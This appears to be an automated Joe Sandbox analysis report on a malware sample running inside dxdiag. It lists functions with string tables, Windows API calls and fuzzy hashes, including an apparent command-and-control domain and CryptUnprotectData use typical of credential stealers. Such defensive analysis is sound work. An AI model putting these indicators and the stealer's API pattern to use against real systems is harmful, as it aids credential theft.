Function 0040CDD7 Relevance: 10.3, Strings: 8, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VD}N, xrefs: 0040CEC2
FD089AA551ECCED45EC6468C5C963249, xrefs: 0040CE31
RT, xrefs: 0040D024
AVUF, xrefs: 0040CEC9
nx}v, xrefs: 0040CEBB
9n`, xrefs: 0040CFC9
fixxyplanterv.click, xrefs: 0040D0F2
Z&\, xrefs: 0040D016

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 9n`$AVUF$FD089AA551ECCED45EC6468C5C963249$VD}N$fixxyplanterv.click$nx}v$RT$Z&\
API String ID: 0-2497581166
Opcode ID: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
Instruction ID: d82674ca07e07c92295c7b8026b48e690f7d2c28deac3183c156c38ed5531bfa
Opcode Fuzzy Hash: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
Instruction Fuzzy Hash: 359136B0204B82DFD315CF2AC490262FFA2FF56304B28866DC4965BB95C779B816CF94

Function 004227B0 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 529
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|~, xrefs: 00422A9E
=>, xrefs: 0042281C
4)B, xrefs: 00422D2B, 00422E03
&*Jk, xrefs: 00422827

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &*Jk$4)B$=>$|~
API String ID: 0-1009457168
Opcode ID: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
Instruction ID: 152786c77f951dd3dbca6d6113f2fe09001a096b4f0132f05b015a8fe36a5df1
Opcode Fuzzy Hash: 6dff639c457a5e1b723c2f4fe0a185f0f85ad1e2a079d6f1e4c09787d9b02a4e
Instruction Fuzzy Hash: 74F164B4A00215DFCB10CF68D9826ABBBB1FF85310F18826DD845AF355D378E942CB99

Function 00420B10 Relevance: 8.0, Strings: 6, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00420B43
\, xrefs: 00420D0C
^, xrefs: 00420D16
b, xrefs: 004210FD
,, xrefs: 00421059
], xrefs: 00420D11

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$\$]$^$b
API String ID: 1279760036-3534480190
Opcode ID: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
Instruction ID: ebca42ed76a8c9da250c5dc1f0308dd38997bd67e4ab243a484973a2be5f2ac8
Opcode Fuzzy Hash: 50029825359f53049b828cf9af26bfa21e532a2affc0ca8f3bb32706d71598dd
Instruction Fuzzy Hash: 7F22AE7160C3A08FD324CF28944036FBBE1AB96324F594A6EE5E5873D2D7798845CB4B

Function 00408920 Relevance: 6.1, APIs: 4, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408941
GetCurrentThreadId.KERNEL32 ref: 0040894B
GetForegroundWindow.USER32 ref: 00408A05
ExitProcess.KERNEL32 ref: 00408A85

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
Instruction ID: 0d30fea2273658e8f12e1d2f8b086a2a35bf40361b224995e2d0f0fc3bd077a4
Opcode Fuzzy Hash: b6802a63dc855ea8cf6a96f0c0c01603e3ca00871471397b2fb2a3d67851cf4b
Instruction Fuzzy Hash: E6313833A043144FD308EF799D8621AF6D6ABC8350F06953EF8C8DB391DA749C05868A

Function 0040AAE0 Relevance: 5.4, Strings: 4, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

KRST, xrefs: 0040AC4B
/8=+, xrefs: 0040AD9F
+, xrefs: 0040AAFE
/8=+, xrefs: 0040AD45, 0040AF11, 0040AF3D, 0040AF08

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: +$/8=+$/8=+$KRST
API String ID: 0-1235365206
Opcode ID: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
Instruction ID: 157f1745fbdc77b4c2282c5122e8992570511c6dc21cebd8a3ce22f79508730e
Opcode Fuzzy Hash: 4fa6eea03b5ea1160ce96f4ada282d6b801ef76b08be5e27514b240a772fc098
Instruction Fuzzy Hash: AEC1277264C3504BD314CF6584516ABFBE3AFD1304F18883DE4E5AB381D639891AC797

Function 00431262 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 004312B0
GetSystemMetrics.USER32 ref: 004312BF

Strings

, xrefs: 00431393

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
Instruction ID: bf2bc5d8e4d95e73b8fdb797fadfe66e5eac667f6d15a87326ad77e9f8a434e9
Opcode Fuzzy Hash: ed2441843b2d6ce89a690faeaea5bdcfa444fb032f0210175a3dc45da2a87aca
Instruction Fuzzy Hash: 665182B0D142099FDB40EFACD985A9EBBF0BB88310F114569E499E7350D734AD48CF96

Function 00415971 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 457
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415C24

Strings

Q, xrefs: 00415AF1

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: Q
API String ID: 834300711-3463352047
Opcode ID: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
Instruction ID: 334bc079e22fc92185ed06b095f9784487d9b1feb53ebf903c8272a05930d261
Opcode Fuzzy Hash: e8c8e02fa5489a845f6c984ef1467f98ecb597ddb46adf86ef07d069ee49b4f0
Instruction Fuzzy Hash: 0BE1F3B55483818FD720CF24C8917EFBBA2EFD5314F04493DE4898B252EB389985CB4A

Function 00425480 Relevance: 2.8, Strings: 2, Instructions: 315COMMON

Download Yara Rule

Strings

&#$, xrefs: 00425520
}ji~, xrefs: 0042574C

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: &#$$}ji~
API String ID: 2994545307-3214320781
Opcode ID: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
Instruction ID: 7a21dba1f6b4e75eed38616ab3744ad9dd1eab9b40c1e5948c0a189561833efb
Opcode Fuzzy Hash: 5931b0502365ebbec1996e2a82422ef558332029e6c540395b09d36738237def
Instruction Fuzzy Hash: C3914B76B047105BD7149E24ECC2B7B73A2EBC1318F98843EE94687396E67C9C05D399

Function 00439E40 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00438640 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

/J x, xrefs: 004386CF

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: /J x
API String ID: 2994545307-1866642894
Opcode ID: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
Instruction ID: 874112095a5efa33bfbcb898a975de2e52caa01511d8d9f4d2bd4c75d1d74cee
Opcode Fuzzy Hash: f30544c505241ad8f6770229db064c02dd71acb82eae6ebeaea714bf93423867
Instruction Fuzzy Hash: 55518A71A043008FE724EE299C8166BF7A2EBC9714F299A3EE58457381DE389C018799

Function 0043C8F0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

@, xrefs: 0043C959

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
Instruction ID: a35a6d60c968e134acf55cef92dc51cc7359e84a70f9638e84e2e7fd5f809bf1
Opcode Fuzzy Hash: 0a54cfb0382d90671bf8a8549960c687a3425552f5adc6159ffc4faefce21d6a
Instruction Fuzzy Hash: D53102B15083048BD314EF14C8C16AFF7F5EF9A320F15A92EE99557390D3799848CB9A

Function 0043D400 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
Instruction ID: 9a74d657e93f8d3f5cf240051ad191b629485e22a32f0a110a3d4ded04f7e6bd
Opcode Fuzzy Hash: 5ce9da3ec3eabb230dc047e1443a7ed10ff4abf91167f9ef0f8a3aa1cfdc4362
Instruction Fuzzy Hash: 4FA12532A083114BD314CE28D89156BBBE2EBDA314F29EA3EE9A597351D738DC05C785

Function 0043CA10 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
Instruction ID: 1330599076484d40c3e41ed8303109be540c1e7eaad1d2ba3b2e5e3a43da2089
Opcode Fuzzy Hash: b70ec3a45a838298925cd4cddba91232df754bc9f20b4abfcf63beb9f04927e9
Instruction Fuzzy Hash: E07133316043018BD714EF28D8D1A7FB7E2EB89310F19E53EE8899B391DB389C409789

Function 00435530 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
Instruction ID: 058e7eb1b77869290f7d29a5434ce18bf9e6f536ede9c38a5ab45312e861f76d
Opcode Fuzzy Hash: d7d9fbbb4968f9e9959b441f158be0a7c4b757bd456b857d1f889996084494c4
Instruction Fuzzy Hash: 79A1073250C7818FD3149B38885126FBBD25BCA324F194B6EE5EA473D1D678C941C74B

Function 0043A7F4 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
Instruction ID: 862a6d1eb3e04205f618e8bd76b9e7ff9fb97f5fdbb19bdb3795918c96e67ed1
Opcode Fuzzy Hash: ddc78d1b04d6bec4008d7390ca24b1b937114dd695eca5aeaa2e66312c2f3a60
Instruction Fuzzy Hash: EF3179726805018BDB1CDB28DC91A7E7362EB5E324F2A572ED492B77E1C7389C12C749

Function 0040D866 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
Instruction ID: 01ca3aed7babf808add9e7fd7257d4aa18570a6a75482a61117814391ff3c097
Opcode Fuzzy Hash: 343dc57fd85ca318e9cab81e4ba610ce05acd3c36ba71d43b9120f80a9a00c8a
Instruction Fuzzy Hash: AA31BF76B10A008BD728CF29C851B26B7E3BFC6304F19D12DD09AC77A5EB78A8018B54

Function 0040CC16 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040CC1A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD67

Strings

(02N, xrefs: 0040CD73

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: Initialize
String ID: (02N
API String ID: 2538663250-482182587
Opcode ID: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
Instruction ID: d17696292bc297aee8fb915d5703223a9b482fd72e7288d2817973478bab555f
Opcode Fuzzy Hash: 5dda1f8ef3903148d2f90ff3463849efe98f65f23156c3258cfb4110ce7950d6
Instruction Fuzzy Hash: 3E41B6B4D10B40AFD370EF39DA0B7127EB4AB05250F504B2DF9EA866D4E631A4198BD7

Function 0040CDA5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDB7

Strings

Nf, xrefs: 0040CDC7

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: InitializeSecurity
String ID: Nf
API String ID: 640775948-501009845
Opcode ID: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
Instruction ID: d4c561bf1a5b18bbc5a108682527e0612a5fd10810c78835407b1c78b182e784
Opcode Fuzzy Hash: cc0bac53719f05fd76b6ebac675668444252fa88d21156f1485ccdb508311816
Instruction Fuzzy Hash: 8AD092347D4240BAE2249708AC17F1022119302F55F300226B363EE2E0D9907141860D

Function 00433195 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 004331B5

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
Instruction ID: 3dcccac6d406af36a65d69c1e0d77e321988698b0dd3df6f47d0d67d5a4e7b69
Opcode Fuzzy Hash: 2f573e232fa3002a4601395236eb5b6ae86ddd1d5b3cef5a9b094565ea09aab7
Instruction Fuzzy Hash: 5A119435A055848FCB19CF38CC54B5ABFF16F4B201F09C1EED95997392CA349909CB11

Function 00439DE0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,00000000,-00001000,0043634D,00000000,-00001000,00000040,?,00000000), ref: 00439E12

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
Instruction ID: f371fc5d33ece009c4c3a0571b7c3e2245088c9ce721a5e6db8221790f4f6db8
Opcode Fuzzy Hash: eb7d745538af2e112f280afb521d2e7db1d87c50453d574173b658df3250f6e1
Instruction Fuzzy Hash: 99E02B76514710EBC6005F64BC07B1B3B64EF8A712F01083AF44496152DB38E801C5EF

Function 0042F18E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042F1D6

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
Instruction ID: 92cf7cd52a0b26c4ab4cf5037d2a8ef19b8d3357c895488f279ef1d82b73d9c3
Opcode Fuzzy Hash: f066d8136630dc46cb24742ad5accdc9ac96aa1f0028cb8de37fa5b4ae37cf04
Instruction Fuzzy Hash: 3AF0B7B45087018FE314DF29D5A8716BBF0FB84304F10891CE4968B391CBB5A648CF86

Function 0042CEE6 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042CF2E

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
Instruction ID: 0899820397365732e2da90ce65a4afed0ef7eceabc5b433f77fa9bfe01264dcb
Opcode Fuzzy Hash: 2b6c7347b63c56c7ba1f0f97762e9121d9dc5645105ebc7166e137d76f548b4c
Instruction Fuzzy Hash: BFF0DA745093018FD314DF29D0A871BBBE0FB88714F00891CE4958B390DB75A648CF82

Function 00438612 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043862D

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
Instruction ID: 4b498aae19b3e6e4938b8adf9d962b10c79c0f4802967231e3dbdd59588952b8
Opcode Fuzzy Hash: 27747b72a67b977cf105f9c95d7ced292bc03dc07a125d0771843c6e3fd466d0
Instruction Fuzzy Hash: 7DC08C31404A26EBCA102F18BC07BCA3A20DF0A321F0308A1F900980B6C739DC92C9DC

Function 004385E0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,00000000,00414C1F,00000400), ref: 004385F0

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
Instruction ID: 1ff8db07d7a6c5951f5da3d7f0bd717f597c0928698ba3c33e75086f2b70e91b
Opcode Fuzzy Hash: bca7d58748ae5aecf304c81bf07840e3b5a28b072888644e0b079d4f2959ecbd
Instruction Fuzzy Hash: 3CC04C35445220AAC6106B15EC05B867B54DF49351F014055B104660728760AC418AD9

Non-executed Functions

Function 00412200 Relevance: 129.6, Strings: 102, Instructions: 2133COMMON

Download Yara Rule

Strings

d, xrefs: 00413747
A, xrefs: 00413627
(, xrefs: 0041247C
g, xrefs: 00413195
|, xrefs: 0041319A
H, xrefs: 00412624
], xrefs: 004139FC
g, xrefs: 00412ED4
K, xrefs: 004135E7
_, xrefs: 00413A0C
o, xrefs: 00413A8C
M, xrefs: 0041397C
@, xrefs: 00413A14
&, xrefs: 0041291D
;, xrefs: 0041251D
v, xrefs: 00413707
K, xrefs: 004128BD
R, xrefs: 0041275D
p, xrefs: 00412375
a, xrefs: 00413A1C
[, xrefs: 004139EC
Y, xrefs: 004128ED
s, xrefs: 00412767
i, xrefs: 00413A5C
0, xrefs: 00413914
W, xrefs: 004139CC
f, xrefs: 00412ECC
N, xrefs: 00413A84
M, xrefs: 004136B7
Q, xrefs: 00413677
g, xrefs: 00413A4C
, xrefs: 00413DFF
}, xrefs: 004122C2
H, xrefs: 00413607
a, xrefs: 00412EA4
F, xrefs: 00413637
O, xrefs: 0041398C
G, xrefs: 0041394C
4, xrefs: 0041276C
k, xrefs: 00413A6C
}, xrefs: 0041290D
f, xrefs: 00413737
C, xrefs: 0041392C
:, xrefs: 00413954
t, xrefs: 004139B4
9, xrefs: 00412DF5
E, xrefs: 0041393C
r, xrefs: 00412762
a, xrefs: 00413717
;, xrefs: 00412E05
", xrefs: 00413DEF
O, xrefs: 00413647
), xrefs: 00413DCF
@, xrefs: 00413363
$, xrefs: 00413974
D, xrefs: 004140F8
/, xrefs: 00413E07
S, xrefs: 004139AC
=, xrefs: 00412E15
I, xrefs: 0041395C
D, xrefs: 00413B8D
", xrefs: 004139E4
K, xrefs: 0041396C
9, xrefs: 00413964
W, xrefs: 00413667
g, xrefs: 00413DDF
e, xrefs: 00412EC4
+, xrefs: 00413984
U, xrefs: 004139BC
;, xrefs: 00412D1F
-, xrefs: 00413924
9, xrefs: 004139F4
{, xrefs: 004139C4
7, xrefs: 00412DE5
=, xrefs: 004139D4
!, xrefs: 00413DF7
?, xrefs: 00412CFF
p, xrefs: 00413A94
m, xrefs: 00413A7C
Z, xrefs: 00412DCD
o, xrefs: 00413571
#, xrefs: 00413944
5, xrefs: 00412DD5
$, xrefs: 004128CD
>, xrefs: 004139A4
`, xrefs: 00412F89
=, xrefs: 00413A04
W, xrefs: 004128DD
&, xrefs: 004128FD
Q, xrefs: 0041399C
Y, xrefs: 004139DC
B, xrefs: 004135F7
A, xrefs: 0041391C
c, xrefs: 00413A2C
$, xrefs: 00412D0F
q, xrefs: 00413A9C
A, xrefs: 00413373
<, xrefs: 00412E0D
e, xrefs: 00413A3C
3, xrefs: 00413934
<, xrefs: 00413994
c, xrefs: 00412EB4

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: $!$"$"$#$$$$$$$&$&$($)$+$-$/$0$3$4$5$7$9$9$9$:$;$;$;$<$<$=$=$=$>$?$@$@$A$A$A$B$C$D$D$E$F$G$H$H$I$K$K$K$M$M$N$O$O$Q$Q$R$S$U$W$W$W$Y$Y$Z$[$]$_$`$a$a$a$c$c$d$e$e$f$f$g$g$g$g$i$k$m$o$o$p$p$q$r$s$t$v${$|$}$}
API String ID: 0-2298439183
Opcode ID: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
Instruction ID: 083fd10bc4ed8af0561365f8755418076205ed3f8dd68f74a68bf74da31982d7
Opcode Fuzzy Hash: 2fca1a34db66d2f979c72fa397fdd48071d883c2b4100c1f0ee5dc9a809098c4
Instruction Fuzzy Hash: 8E13B23160C7C18AD335CB38845539FBBE2ABD6324F188A6EE4E9873D2D6788542C757

Function 004238F0 Relevance: 21.8, Strings: 17, Instructions: 517COMMON

Download Yara Rule

Strings

46, xrefs: 0042444A
rM, xrefs: 00423CC5
OM, xrefs: 00424123
O:, xrefs: 0042412E
R\, xrefs: 00423E86
uv, xrefs: 00424025
GP, xrefs: 00423CD0
{w, xrefs: 00423CBA
8X, xrefs: 00424139
CH, xrefs: 00424144
rs, xrefs: 00423DEE
^E, xrefs: 00423E8E
JY, xrefs: 00423E7E
29B, xrefs: 00423860, 0042391F
GI, xrefs: 00423BBD
|~, xrefs: 00424384
02, xrefs: 0042443F

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 29B$8X$CH$GP$JY$O:$OM$R\$^E$rs$rM$uv${w$02$46$GI$|~
API String ID: 0-2187006609
Opcode ID: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
Instruction ID: 571314284cfc883063d67328f2f268305e4fa17690c0835aa9d0b0b07ad656d6
Opcode Fuzzy Hash: ecc0fc787c0b6cd285c1698c568045089e0644926ad2ac97ce3fe72f36c1f917
Instruction Fuzzy Hash: 37421DB564C3818AD330CF54D842B9FBAF2EBD2300F00892DD5E96B256C775864ADB97

Function 00434ED0 Relevance: 21.6, Strings: 17, Instructions: 319COMMON

Download Yara Rule

Strings

<, xrefs: 0043516D
\, xrefs: 00434EE3
], xrefs: 00434EE8
q, xrefs: 0043508A
], xrefs: 00434FBA
~, xrefs: 00435125
&, xrefs: 00435177
[, xrefs: 00434EDE
#, xrefs: 00435232
\, xrefs: 00434FB5
|, xrefs: 0043511B
\, xrefs: 0043517C
y, xrefs: 00435116
[, xrefs: 00434FB0
), xrefs: 00435237
-, xrefs: 004351E2
H, xrefs: 00435120

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: #$&$)$-$<$H$[$[$\$\$\$]$]$q$y$|$~
API String ID: 0-875500967
Opcode ID: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
Instruction ID: 5554db80201a8ba6ea3474702efe9192065d530e6ae71f569cd6bb248edef4d2
Opcode Fuzzy Hash: 3bcbecbddcf8bc29a05a5b43c94189d71db8383b50a5ea400568bbe92f363e52
Instruction Fuzzy Hash: 4FB10A23A1D7904AE314897C884535B9EC31BE6224F2ECB6DD8E5973C2D57DC9068393

Function 004303F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 124clipboardCOMMON

